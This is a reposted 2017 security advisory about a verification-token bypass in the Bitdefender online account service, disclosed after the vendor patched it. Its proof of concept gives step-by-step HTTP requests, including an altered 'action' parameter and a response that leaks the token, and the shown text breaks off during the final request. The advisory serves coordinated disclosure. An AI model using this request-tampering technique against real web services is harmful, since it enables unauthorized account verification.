Document Title: =============== Bit Defender #39 - Auth Token Bypass Vulnerability References (Source): ==================== http://ift.tt/2j6VUHO Release Date: ============= 2017-01-09 Vulnerability Laboratory ID (VL-ID): ==================================== 1683 Common Vulnerability Scoring System: ==================================== 5.9 Product & Service Introduction: =============================== Bitdefender is a Romanian internet security software company, represented through subsidiaries and partners in over 100 countries. The company has been developing online protection since 2001. At September 2014 Bitdefender technologies were installed in around 500 million home and corporate devices across the globe. (Copy of the Homepage: http://ift.tt/1Dw5OZ2 ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered a remote session token bypass vulnerability in the official Bitdefender online service web-application (my.bitdefender). Vulnerability Disclosure Timeline: ================================== 2016-01-25: Researcher Notification & Coordination (Lawrence Amer) 2016-01-26: Vendor Notification (Bitdefender Security Team) 2016-02-03: Vendor Response/Feedback (Bitdefender Security Team) 2016-12-01: Vendor Fix/Patch (Bitdefender Developer Team) 2016-12-31: Security Acknowledgements (Bitdefender Security Team) 2017-01-09: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Bitdefender Product: My Bitdefender - Online Service (Web-Application) 2016 Q1 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A token bypass vulnerability has been discovered in the official Bitdefender online service web-application (my.bitdefender). The vulnerability allows remote attackers to bypass the secure protection mechanism of verification procedure in the online-service. A vulnerability allows remote attackers to bypass the token which responsible for confirming the owner of current email address to get a confirmed account from bitdefender for security products. The vulnerability considerd as method followed by remote attackers to bypass the correct method of verfication . and located in module which reponsible for registering new customers [/lv2/account?login=] . a semia col added to parameter [ action] which expose the verfication token , which used later for bypassing. The security risk of the token filter bypass web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.9. Exploitation of the token filter bypass web vulnerability requires no privileged user account or user interaction. Successful exploitation of the vulnerability results in unauthorized verification of user credentials in the online service web-application. Request Method: [+] GET Vulnerable Module: [+] /lv2/account?login= Vulnerable Parameter(s): [+] [action] Affected Domain(s): [+] my.bitdefender.com Proof of Concept (PoC): ======================= The token bypass web vulnerability can be exploited by a remote attackers without privileged web-application user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerbility ... 1. The remote attacker registers wih my.bitdefender.com , after registration the current status of un-verfied accounts is [4] while the [1] is verfied 2. Now the attacker add a semia col to action parameter like: action=' with GET Request: GET /lv2/account?login=vulnerabilitybugtrue@mail.com&pass=[EMAIL_CURRENT_PASSWORD]&action=;&type=userpass&fp=web&lang=en_us&beta=true HTTP/1.1 Host: my.bitdefender.com User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://ift.tt/1LofCms Cookie: s_vi=[CS]v1|2B4FB32A051D2F01-6000190280001A6A[CE]; bd112=lY5LDoIwFEX30qQjCf1BsCTGgTp0BdYBlCpNLMXHI5gY9i4LYICzM7j35Ny%2BZIQXKUmL2JeGGTZNU1p7bNzDdY2D1MZg2ODRGXatfLewq8C2hh3fByoLqi5UnXx47gawVJ0%2Fu9g5gAgL9xBDj1TuCyr1MiQJQR%2FcgFXoSSmyXEnNVcHn5P8KGzusLBom1q1abLWu%2FQXncnPVWAePa54iU7nO5%2FsP; visid_incap_444053=meSoTqUSRwCAL8O9SNbIZW5zn1YAAAAAQUIPAAAAAABtAdmh8HM0LDXk6stcsU0R; __qca=P0-565467393-1453315617095; trh3=AWsAlP%2BVbGRto4xjbW6TbmNtrpFdWXiUbGZsrqZiVFl3VaWZpaacl5GIppdUb6VtZV5dS66go5iWaGZhVGKnpmaimGegW49ecWOVlaBqVWOWY3ZtVKiboJibl4qqo1Rvm21kXFhcb2xiaGdsbqWgpg%3D%3D; shsid=11947017; rerew4=W56TmuvVMT0%2BDwA%3D; oidfg4=m5qTnLt4AQA%3D; fsd2=m5qTnLt4AQA%3D; __cfduid=dd46406ce24e76b99369c3c1422d61a881453744387; _ga=GA1.3.875146899.1453769753; bdselcid=en; country_id=en; _country=sy; _cbml=%7B%22name%22%3A%22en_us%22%7D; _cbmrb=false; _cbme=%22%22; _cbmci=%22%22; _gat=1 Connection: keep-alive 3. Got this response which will leak the verfication token Response : HTTP/1.1 200 OK Server: cloudflare-nginx Date: Tue, 26 Jan 2016 01:31:41 GMT Content-Type: application/json Connection: keep-alive X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=63072000; includeSubdomains; preload X-Content-Type-Options: nosniff CF-RAY: 26a875b0da9f356c-LHR Content-Length: 229 { "preferences": "{"lang": "en_us"}", "country_id": "204", "token": "2OZ6INMWmWythZEonNWQjsy4GtE", "error": "pending", "passmd5": "e807f1fcf82d132f9bb018ca6738a19f", "login": "vulnerabilitybugtrue@mail.com" } 4. The last step is to use the token that was leaked from previous step GET /lv2/act_pending?token=2OZ6INMWmWythZEonNWQjsy4GtE&redirect_uri=https%3A%2F%2Fmy.bitdefender.com%2Fdashboard%3F HTTP/1.1 Host: my.bitdefender.com User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate
Source: Gmail -> IFTTT-> Blogger
No comments:
Post a Comment